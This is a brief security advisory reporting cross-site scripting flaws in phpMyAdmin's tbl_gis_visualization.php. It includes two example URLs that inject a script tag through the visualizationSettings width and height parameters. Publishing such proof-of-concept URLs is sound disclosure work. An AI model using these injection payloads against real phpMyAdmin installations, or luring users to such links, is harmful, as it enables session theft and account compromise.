phpMyAdmin 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities

Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/PMA/tbl_gis_visualization.php?db=information_schema&token=17961b7ab247b6d2b39d730bf336cebb&visualizationSettings[width]="><script>alert(123);</script>

http://www.example.com/PMA/tbl_gis_visualization.php?db=information_schema&token=17961b7ab247b6d2b39d730bf336cebb&visualizationSettings[height]="><script>alert(123);</script>


 

Privacy Statement
Copyright 2010, SecurityFocus